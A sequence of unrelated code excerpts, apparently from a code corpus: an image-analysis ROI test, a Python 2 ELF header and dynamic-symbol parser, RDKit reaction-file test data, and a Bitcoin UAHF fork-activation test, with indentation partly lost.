            data, processed = self._get_data()
            proc._norm_combo = combo
            proc._norm_type = norm_type
            proc.process(data)
            s = self._get_roi_slice(getattr(processed.roi, geom).geometry)
            # ground truth computed from the masked mean image
            assert fom_handler(processed.image.masked_mean[s[0], s[1]]) == \
                pytest.approx(processed.roi.norm)
        for norm_combo in [RoiCombo.ROI3_SUB_ROI4, RoiCombo.ROI3_ADD_ROI4]:
            data, processed = self._get_data()
            proc._norm_combo = norm_combo
            proc._norm_type = norm_type
            proc.process(data)
            s3 = self._get_roi_slice(processed.roi.geom3.geometry)
            fom3_gt = fom_handler(processed.image.masked_mean[s3[0], s3[1]])
            s4 = self._get_roi_slice(processed.roi.geom4.geometry)
            fom4_gt = fom_handler(processed.image.masked_mean[s4[0], s4[1]])
            if norm_combo == RoiCombo.ROI3_SUB_ROI4:
                assert fom3_gt - fom4_gt == pytest.approx(processed.roi.norm, rel=1e-3)
            else:
                assert fom3_gt + fom4_gt == pytest.approx(processed.roi.norm, rel=1e-4)
@pytest.mark.parametrize("fom_type, fom_handler",
[(k, v) for k, v in _roi_fom_handlers.items()])
@pytest.mark.parametrize("normalizer, norm", [(Normalizer.UNDEFINED, 1),
(Normalizer.ROI, 2.),
(Normalizer.XGM, 4.),
(Normalizer.DIGITIZER, 8.)])
def testRoiFom(self, fom_type, fom_handler, normalizer, norm):
def mocked_process_norm(p_data):
if normalizer == Normalizer.ROI:
p_data.roi.norm = 2.0
elif normalizer == Normalizer.XGM:
p_data.pulse.xgm.intensity = np.array([4., 4., 4., 4.]) # mean = 4.0
elif normalizer == Normalizer.DIGITIZER:
p_data.pulse.digitizer.ch_normalizer = 'A'
p_data.pulse.digitizer['A'].pulse_integral = np.array([8., 8., 8., 8.]) # mean = 8.0
proc = self._proc
proc._fom_type = fom_type
proc._fom_norm = normalizer
# We do not test all the combinations of parameters.
with patch.object(proc, "_process_norm", side_effect=mocked_process_norm):
for combo, geom in zip([RoiCombo.ROI1, RoiCombo.ROI2], ['geom1', 'geom2']):
data, processed = self._get_data()
proc._fom_combo = combo
proc.process(data)
s = self._get_roi_slice(getattr(processed.roi, geom).geometry)
assert fom_handler(processed.image.masked_mean[s[0], s[1]])/norm == \
pytest.approx(processed.roi.fom, rel=1e-4)
for fom_combo in [RoiCombo.ROI1_SUB_ROI2, RoiCombo.ROI1_ADD_ROI2, RoiCombo.ROI1_DIV_ROI2]:
data, processed = self._get_data()
proc._fom_combo = fom_combo
proc.process(data)
s1 = self._get_roi_slice(processed.roi.geom1.geometry)
fom1_gt = fom_handler(processed.image.masked_mean[s1[0], s1[1]])
s2 = self._get_roi_slice(processed.roi.geom2.geometry)
fom2_gt = fom_handler(processed.image.masked_mean[s2[0], s2[1]])
if fom_combo == RoiCombo.ROI1_SUB_ROI2:
assert (fom1_gt - fom2_gt) / norm == pytest.approx(processed.roi.fom)
elif fom_combo == RoiCombo.ROI1_ADD_ROI2:
assert (fom1_gt + fom2_gt) / norm == pytest.approx(processed.roi.fom)
else:
assert (fom1_gt / fom2_gt) / norm == pytest.approx(processed.roi.fom)
if fom_combo == RoiCombo.ROI1_DIV_ROI2:
with np.warnings.catch_warnings():
np.warnings.simplefilter("ignore", category=RuntimeWarning)
# test ROI1 FOM is a number and ROI2 FOM equals to 0, which produces inf
# However, inf/inf produces nan
s2 = self._get_roi_slice(processed.roi.geom2.geometry)
processed.image.masked_mean[s2[0], s2[1]] = 0
proc.process(data)
if fom_type in (RoiFom.N_STD, RoiFom.N_VAR):
assert np.isnan(processed.roi.fom)
else:
assert np.isinf(processed.roi.fom)
# both ROI1 FOM and ROI2 FOM are nan
data, processed = self._get_data()
processed.image.masked_mean[:] = np.nan
proc.process(data)
assert np.isnan(processed.roi.fom)
def testRoiHist(self):
proc = self._proc
mocked_return = 1, 1, 1, 1, 1
| |
terminated (nEnd == -1)
nEnd = max(nStart, nEnd)
self.sections[i].sectionName = bytes(stringtable_str[nStart:nEnd])
###############################################
# parse program header table
'''
typedef struct {
uint32_t p_type;
Elf32_Off p_offset;
Elf32_Addr p_vaddr;
Elf32_Addr p_paddr;
uint32_t p_filesz;
uint32_t p_memsz;
uint32_t p_flags;
uint32_t p_align;
} Elf32_Phdr;
typedef struct {
uint32_t p_type;
uint32_t p_flags;
Elf64_Off p_offset;
Elf64_Addr p_vaddr;
Elf64_Addr p_paddr;
uint64_t p_filesz;
uint64_t p_memsz;
uint64_t p_align;
} Elf64_Phdr;
The main difference lies in the location of p_flags within the struct.
'''
# create a list of the program_header_table
self.segments = list()
for i in range(self.header.e_phnum):
'''
uint32_t p_type;
This member of the Phdr struct tells what kind of segment
this array element describes or how to interpret the array
element's information.
(uint32_t p_flags; (Elf64_Phdr only, see below))
ElfN_Off p_offset; (N = 32/64)
This member holds the offset from the beginning of the
file at which the first byte of the segment resides.
ElfN_Addr p_vaddr; (N = 32/64)
This member holds the virtual address at which the first
byte of the segment resides in memory.
ElfN_Addr p_paddr; (N = 32/64)
On systems for which physical addressing is relevant, this
member is reserved for the segment's physical address.
Under BSD this member is not used and must be zero.
uintN_t p_filesz; (N = 32/64)
This member holds the number of bytes in the file image of
the segment. It may be zero.
uintN_t p_memsz; (N = 32/64)
This member holds the number of bytes in the memory image
of the segment. It may be zero.
uint32_t p_flags; (Elf32_Phdr only, for 64 see above)
This member holds a bitmask of flags relevant to the segment:
PF_X An executable segment.
PF_W A writable segment.
PF_R A readable segment.
A text segment commonly has the flags PF_X and PF_R.
A data segment commonly has PF_X, PF_W and PF_R.
uintN_t p_align; (N = 32/64)
This member holds the value to which the segments are aligned
in memory and in the file. Loadable process segments
must have congruent values for p_vaddr and p_offset, modulo
the page size. Values of zero and one mean no alignment is
required. Otherwise, p_align should be a positive, integral
power of two, and p_vaddr should equal p_offset, modulo
p_align.
'''
tempSegment = Segment()
tempOffset = self.header.e_phoff + i*self.header.e_phentsize
if self.bits == 32:
unpackedSegment = struct.unpack('< I 5I I I', \
buffer_list[tempOffset:tempOffset+32])
elif self.bits == 64:
unpackedSegment = struct.unpack('< I I 5Q Q', \
buffer_list[tempOffset:tempOffset+56])
# order elements as in Elf32_Phdr
unpackedSegment = unpackedSegment[0:1] + unpackedSegment[2:7] \
+ unpackedSegment[1:2] + unpackedSegment[7:8]
del tempOffset
(
tempSegment.elfN_Phdr.p_type,
tempSegment.elfN_Phdr.p_offset, # 32/64 bit!
tempSegment.elfN_Phdr.p_vaddr, # 32/64 bit!
tempSegment.elfN_Phdr.p_paddr, # 32/64 bit!
tempSegment.elfN_Phdr.p_filesz, # 32/64 bit!
tempSegment.elfN_Phdr.p_memsz, # 32/64 bit!
tempSegment.elfN_Phdr.p_flags, # position as in Elf32_Phdr
tempSegment.elfN_Phdr.p_align, # 32/64 bit!
) = unpackedSegment
# check which sections are in the current segment
# (in memory) and add them
for section in self.sections:
segStart = tempSegment.elfN_Phdr.p_vaddr
segEnd = segStart + tempSegment.elfN_Phdr.p_memsz
sectionStart = section.elfN_shdr.sh_addr
sectionEnd = sectionStart + section.elfN_shdr.sh_size
if segStart <= sectionStart and sectionEnd <= segEnd:
tempSegment.sectionsWithin.append(section)
self.segments.append(tempSegment)
# get all segments within a segment
for outerSegment in self.segments:
# PT_GNU_STACK only holds access rights
if outerSegment.elfN_Phdr.p_type == P_type.PT_GNU_STACK:
continue
for segmentWithin in self.segments:
# PT_GNU_STACK only holds access rights
if segmentWithin.elfN_Phdr.p_type == P_type.PT_GNU_STACK:
continue
# skip if segments are the same
if segmentWithin == outerSegment:
continue
# check if segmentWithin lies within the outerSegment
innerStart = segmentWithin.elfN_Phdr.p_offset
innerEnd = innerStart + segmentWithin.elfN_Phdr.p_filesz
outerStart = outerSegment.elfN_Phdr.p_offset
outerEnd = outerStart + outerSegment.elfN_Phdr.p_filesz
if outerStart <= innerStart and innerEnd <= outerEnd:
outerSegment.segmentsWithin.append(segmentWithin)
###############################################
# parse dynamic segment entries
'''
typedef struct {
Elf32_Sword d_tag;
union {
Elf32_Word d_val;
Elf32_Addr d_ptr;
} d_un;
} Elf32_Dyn;
typedef struct {
Elf64_Sxword d_tag;
union {
Elf64_Xword d_val;
Elf64_Addr d_ptr;
} d_un;
} Elf64_Dyn;
'''
# find dynamic segment
dynamicSegment = None
for segment in self.segments:
if segment.elfN_Phdr.p_type == P_type.PT_DYNAMIC:
dynamicSegment = segment
break
if dynamicSegment is None:
raise ValueError("Segment of type PT_DYNAMIC was not found.")
# create a list for all dynamic segment entries
self.dynamicSegmentEntries = list()
if self.bits == 32:
structFmt = '<II'
elif self.bits == 64:
structFmt = '<QQ'
dynSegEntrySize = struct.calcsize(structFmt)
endReached = False
for i in range((dynamicSegment.elfN_Phdr.p_filesz / dynSegEntrySize)):
# parse dynamic segment entry
dynSegmentEntry = ElfN_Dyn()
tempOffset = dynamicSegment.elfN_Phdr.p_offset + i*dynSegEntrySize
(
dynSegmentEntry.d_tag,
dynSegmentEntry.d_un,
) = struct.unpack(structFmt,
self.data[tempOffset:tempOffset+dynSegEntrySize])
del tempOffset
# add dynamic segment entry to list
self.dynamicSegmentEntries.append(dynSegmentEntry)
# check if the end of the dynamic segment array is reached
if dynSegmentEntry.d_tag == D_tag.DT_NULL:
endReached = True
break
# check if end was reached with PT_NULL entry
if not endReached:
raise ValueError("PT_NULL was not found in segment of type" \
+ "PT_DYNAMIC (malformed ELF executable/shared object).")
###############################################
# parse relocation entries
# search for relocation entries in dynamic segment entries
jmpRelOffset = None
pltRelSize = None
pltRelType = None
relEntrySize = None
relOffset = None
relSize = None
relaEntrySize = None
relaOffset = None
relaSize = None
symbolEntrySize = None
symbolTableOffset = None
stringTableOffset = None
stringTableSize = None
for dynEntry in self.dynamicSegmentEntries:
if dynEntry.d_tag == D_tag.DT_JMPREL:
if jmpRelOffset is not None:
raise ValueError("Can't handle multiple DT_JMPREL")
jmpRelOffset = self.virtualMemoryAddrToFileOffset(dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_PLTRELSZ:
pltRelSize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_PLTREL:
pltRelType = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_RELENT:
if relEntrySize is not None:
raise ValueError("Can't handle multiple DT_RELENT")
relEntrySize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_RELAENT:
if relaEntrySize is not None:
raise ValueError("Can't handle multiple DT_RELAENT")
relaEntrySize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_REL:
if relOffset is not None:
raise ValueError("Can't handle multiple DT_REL")
relOffset = self.virtualMemoryAddrToFileOffset(dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_RELA:
if relaOffset is not None:
raise ValueError("Can't handle multiple DT_RELA")
relaOffset = self.virtualMemoryAddrToFileOffset(dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_RELSZ:
relSize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_RELASZ:
relaSize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_SYMENT:
symbolEntrySize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_SYMTAB:
# get the offset in the file of the symbol table
symbolTableOffset = self.virtualMemoryAddrToFileOffset(
dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_STRTAB:
# get the offset in the file of the string table
stringTableOffset = self.virtualMemoryAddrToFileOffset(
dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_STRSZ:
stringTableSize = dynEntry.d_un
# check if ELF got needed entries
if (stringTableOffset is None
or stringTableSize is None
or symbolTableOffset is None
or symbolEntrySize is None):
raise ValueError("No dynamic section entry of type DT_STRTAB," \
" DT_STRSZ, DT_SYMTAB and/or DT_SYMENT found (malformed ELF" \
" executable/shared object).")
# estimate symbol table size in order to not rely on sections
# when ELF is compiled with gcc, the .dynstr section (string table)
# follows directly the .dynsym section (symbol table)
# => size of symbol table is difference between string and symbol table
estimatedSymbolTableSize = stringTableOffset - symbolTableOffset
# find .dynsym section in sections
# and only use if it exists once
dynSymSection = None
dynSymSectionDuplicated = False
dynSymSectionIgnore = False
dynSymEstimationIgnore = False
for section in self.sections:
if section.sectionName == ".dynsym":
# check if .dynsym section only exists once
# (because section entries are optional and can
# be easily manipulated)
if dynSymSection is None:
dynSymSection = section
# when .dynsym section exists multiple times
# do not use it
else:
dynSymSectionDuplicated = True
break
# check if .dynsym section exists
if dynSymSection is None:
print 'NOTE: ".dynsym" section was not found. Trying to use ' \
+ 'estimation to parse all symbols from the symbol table'
dynSymSectionIgnore = True
# check if .dynsym section was found multiple times
elif dynSymSectionDuplicated is True:
print 'NOTE: ".dynsym" section was found multiple times. ' \
+ 'Trying to use estimation to parse all symbols from' \
+ 'the symbol table'
dynSymSectionIgnore = True
# check if symbol table offset matches the offset of the
# ".dynsym" section
elif dynSymSection.elfN_shdr.sh_offset != symbolTableOffset:
print 'NOTE: ".dynsym" section offset does not match ' \
+ 'offset of symbol table. Ignoring the section ' \
+ | |
# Copyright (c) 2015, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import unittest
import os,sys
import pickle
from rdkit import rdBase
from rdkit import Chem
from rdkit.Chem import rdChemReactions, AllChem
from rdkit import Geometry
from rdkit import RDConfig
import itertools, time
test_data = [("good", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R# 0 0 0 0 0 0 0 0 0 1 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M RGP 1 2 1
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R# 0 0 0 0 0 0 0 0 0 2 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M RGP 1 1 2
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R# 0 0 0 0 0 0 0 0 0 1 0 0
11.9811 -6.9292 0.0000 R# 0 0 0 0 0 0 0 0 0 2 0 0
1 2 1 0 0 0 0
M RGP 2 1 1 2 2
M END'''),
("bad", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M RGP 1 2 1
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M RGP 1 1 2
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
11.9811 -6.9292 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
M RGP 2 1 1 2 2
M END'''),
# chemdraw style
("bad", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R2 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
11.9811 -6.9292 0.0000 R2 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
M END'''),
("fail", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R3 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
11.9811 -6.9292 0.0000 R2 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
M END'''),
]
unused_rlabel_in_product = """$RXN
bug.rxn
ChemDraw06121709062D
1 1
$MOL
2 1 0 0 0 0 0 0 0 0999 V2000
0.1604 0.3798 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.1604 -0.3798 0.0000 R 0 0 0 0 0 0 0 0 0 1 0 0
1 2 1 0 0
M END
$MOL
2 1 0 0 0 0 0 0 0 0999 V2000
-1.2690 -1.3345 0.0000 R 0 0 0 0 0 0 0 0 0 1 0 0
1.2690 1.3345 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0
M END
"""
kekule_rxn = """$RXN
bug.rxn
ChemDraw06121709062D
1 1
$MOL
RDKit 2D
6 6 0 0 0 0 0 0 0 0999 V2000
1.5000 0.0000 0.0000 C 0 0 0 0 0 | |
<gh_stars>1-10
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
This test checks activation of UAHF and the different consensus
related to this activation.
It is derived from the much more complex p2p-fullblocktest.
"""
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.blocktools import *
import time
from test_framework.key import CECKey
from test_framework.script import *
from test_framework.cdefs import *
# Error for illegal use of SIGHASH_FORKID (p2p reject message bytes)
SIGHASH_FORKID_ERROR = b'non-mandatory-script-verify-flag (Illegal use of SIGHASH_FORKID)'
# The same failure as surfaced through the RPC layer ("64" = nonstandard reject code).
RPC_SIGHASH_FORKID_ERROR = "64: " + SIGHASH_FORKID_ERROR.decode("utf-8")
# Script-verify failure seen when a FORKID signature is validated pre-fork.
# NOTE(review): the text is truncated ("...top stack e") - presumably matching
# the node's truncated reject string; confirm against the node's source.
SIGHASH_INVALID_ERROR = b'mandatory-script-verify-flag-failed (Script evaluated without error but finished with a false/empty top stack e'
# far into the future - mocktime is pinned to this so the fork can activate
UAHF_START_TIME = 2000000000
class PreviousSpendableOutput(object):
    """A handle on a spendable output: the transaction plus the output index."""

    def __init__(self, tx=None, n=-1):
        # BUG FIX: the original default was ``tx=CTransaction()``. Python
        # evaluates default arguments once at definition time, so every
        # default-constructed instance silently shared the *same*
        # CTransaction object. A None sentinel gives each instance its own
        # fresh transaction while keeping the call signature compatible.
        self.tx = CTransaction() if tx is None else tx
        self.n = n  # the output we're spending
class FullBlockTest(ComparisonTestFramework):
# Can either run this test as 1 node with expected answers, or two and compare them.
# Change the "outcome" variable from each TestInstance object to only do
# the comparison.
def __init__(self):
super().__init__()
self.num_nodes = 1
self.block_heights = {}
self.coinbase_key = CECKey()
self.coinbase_key.set_secretbytes(b"fatstacks")
self.coinbase_pubkey = self.coinbase_key.get_pubkey()
self.forkid_key = CECKey()
self.forkid_key.set_secretbytes(b"forkid")
self.forkid_pubkey = self.forkid_key.get_pubkey()
self.tip = None
self.uahfEnabled = False
self.blocks = {}
def setup_network(self):
self.extra_args = [['-debug',
'-norelaypriority',
"-uahfstarttime=%d" % UAHF_START_TIME,
'-whitelist=127.0.0.1',
'-par=1']]
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir,
self.extra_args,
binary=[self.options.testbinary])
def add_options(self, parser):
super().add_options(parser)
parser.add_option(
"--runbarelyexpensive", dest="runbarelyexpensive", default=True)
def run_test(self):
self.test = TestManager(self, self.options.tmpdir)
self.test.add_all_connections(self.nodes)
# Start up network handling in another thread
NetworkThread().start()
# Mock the time so that block activating the HF will be accepted
self.nodes[0].setmocktime(UAHF_START_TIME)
self.test.run()
def add_transactions_to_block(self, block, tx_list):
[tx.rehash() for tx in tx_list]
block.vtx.extend(tx_list)
# this is a little handier to use than the version in blocktools.py
def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE])):
tx = create_transaction(spend_tx, n, b"", value, script)
return tx
# sign a transaction, using the key we know about
# this signs input 0 in tx, which is assumed to be spending output n in
# spend_tx
def sign_tx(self, tx, spend_tx, n):
scriptPubKey = bytearray(spend_tx.vout[n].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend
tx.vin[0].scriptSig = CScript()
return
(sighash, err) = SignatureHash(
spend_tx.vout[n].scriptPubKey, tx, 0, SIGHASH_ALL)
tx.vin[0].scriptSig = CScript(
[self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))])
def create_and_sign_transaction(self, spend_tx, n, value, script=CScript([OP_TRUE])):
tx = self.create_tx(spend_tx, n, value, script)
self.sign_tx(tx, spend_tx, n)
tx.rehash()
return tx
    def next_block(self, number, spend=None, additional_coinbase_value=0, script=None, extra_sigops=0, block_size=0, solve=True):
        """
        Create a block on top of self.tip, and advance self.tip to point to the new block
        if spend is specified, then 1 satoshi will be spent from that to an anyone-can-spend
        output, and rest will go to fees.

        number: test-local identifier stored in self.blocks (must be unused).
        script: optional scriptPubKey for the 1-satoshi output.
        extra_sigops / block_size: pad the block with filler transactions until
            it reaches exactly block_size bytes and contains extra_sigops
            OP_CHECKSIGs.
        solve: whether to grind a valid proof of work before returning.
        """
        # Anchor on the genesis block when no tip exists yet.
        if self.tip == None:
            base_block_hash = self.genesis_hash
            block_time = int(time.time()) + 1
        else:
            base_block_hash = self.tip.sha256
            block_time = self.tip.nTime + 1
        # First create the coinbase
        height = self.block_heights[base_block_hash] + 1
        coinbase = create_coinbase(height, self.coinbase_pubkey)
        coinbase.vout[0].nValue += additional_coinbase_value
        if (spend != None):
            coinbase.vout[0].nValue += spend.tx.vout[
                spend.n].nValue - 1  # all but one satoshi to fees
        coinbase.rehash()
        block = create_block(base_block_hash, coinbase, block_time)
        spendable_output = None
        if (spend != None):
            # Build the spending transaction for the supplied output.
            tx = CTransaction()
            tx.vin.append(
                CTxIn(COutPoint(spend.tx.sha256, spend.n), b"", 0xffffffff))  # no signature yet
            # This copies the java comparison tool testing behavior: the first
            # txout has a garbage scriptPubKey, "to make sure we're not
            # pre-verifying too much" (?)
            tx.vout.append(
                CTxOut(0, CScript([random.randint(0, 255), height & 255])))
            if script == None:
                tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
            else:
                tx.vout.append(CTxOut(1, script))
            spendable_output = PreviousSpendableOutput(tx, 0)
            # Now sign it if necessary
            scriptSig = b""
            scriptPubKey = bytearray(spend.tx.vout[spend.n].scriptPubKey)
            if (scriptPubKey[0] == OP_TRUE):  # looks like an anyone-can-spend
                scriptSig = CScript([OP_TRUE])
            else:
                # We have to actually sign it: legacy sighash before the fork,
                # FORKID sighash once self.uahfEnabled has been flipped.
                nHashType = SIGHASH_ALL
                sighash = None
                if self.uahfEnabled == False:
                    (sighash, err) = SignatureHash(
                        spend.tx.vout[spend.n].scriptPubKey, tx, 0, SIGHASH_ALL)
                else:
                    nHashType |= SIGHASH_FORKID
                    sighash = SignatureHashForkId(
                        spend.tx.vout[spend.n].scriptPubKey, tx, 0, nHashType, spend.tx.vout[spend.n].nValue)
                scriptSig = CScript(
                    [self.coinbase_key.sign(sighash) + bytes(bytearray([nHashType]))])
            tx.vin[0].scriptSig = scriptSig
            # Now add the transaction to the block
            self.add_transactions_to_block(block, [tx])
            block.hashMerkleRoot = block.calc_merkle_root()
        if spendable_output != None and block_size > 0:
            # Pad with chained filler transactions until the serialized block
            # is exactly block_size bytes; each filler spends the previous one.
            while len(block.serialize()) < block_size:
                tx = CTransaction()
                # 79 bytes is the non-script overhead of the filler tx;
                # presumably derived from the serialization format - confirm.
                script_length = block_size - len(block.serialize()) - 79
                if script_length > 510000:
                    script_length = 500000
                tx_sigops = min(
                    extra_sigops, script_length, MAX_TX_SIGOPS_COUNT)
                extra_sigops -= tx_sigops
                script_pad_len = script_length - tx_sigops
                script_output = CScript(
                    [b'\x00' * script_pad_len] + [OP_CHECKSIG] * tx_sigops)
                tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
                tx.vout.append(CTxOut(0, script_output))
                tx.vin.append(
                    CTxIn(COutPoint(spendable_output.tx.sha256, spendable_output.n)))
                spendable_output = PreviousSpendableOutput(tx, 0)
                self.add_transactions_to_block(block, [tx])
                block.hashMerkleRoot = block.calc_merkle_root()
            # Make sure the math above worked out to produce the correct block size
            # (the math will fail if there are too many transactions in the block)
            assert_equal(len(block.serialize()), block_size)
            # Make sure all the requested sigops have been included
            assert_equal(extra_sigops, 0)
        if solve:
            block.solve()
        # Advance the tip and record the block under its test number.
        self.tip = block
        self.block_heights[block.sha256] = height
        assert number not in self.blocks
        self.blocks[number] = block
        return block
def get_tests(self):
self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
self.block_heights[self.genesis_hash] = 0
spendable_outputs = []
# save the current tip so it can be spent by a later block
def save_spendable_output():
spendable_outputs.append(self.tip)
# get an output that we previously marked as spendable
def get_spendable_output():
return PreviousSpendableOutput(spendable_outputs.pop(0).vtx[0], 0)
# returns a test case that asserts that the current tip was accepted
def accepted():
return TestInstance([[self.tip, True]])
# returns a test case that asserts that the current tip was rejected
def rejected(reject=None):
if reject is None:
return TestInstance([[self.tip, False]])
else:
return TestInstance([[self.tip, reject]])
# move the tip back to a previous block
def tip(number):
self.tip = self.blocks[number]
# adds transactions to the block and updates state
def update_block(block_number, new_transactions):
block = self.blocks[block_number]
self.add_transactions_to_block(block, new_transactions)
old_sha256 = block.sha256
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
# Update the internal state just like in next_block
self.tip = block
if block.sha256 != old_sha256:
self.block_heights[
block.sha256] = self.block_heights[old_sha256]
del self.block_heights[old_sha256]
self.blocks[block_number] = block
return block
# shorthand for functions
block = self.next_block
node = self.nodes[0]
# Create a new block
block(0, block_size=LEGACY_MAX_BLOCK_SIZE)
save_spendable_output()
yield accepted()
# Now we need that block to mature so we can spend the coinbase.
test = TestInstance(sync_every_block=False)
for i in range(99):
block(5000 + i)
test.blocks_and_transactions.append([self.tip, True])
save_spendable_output()
yield test
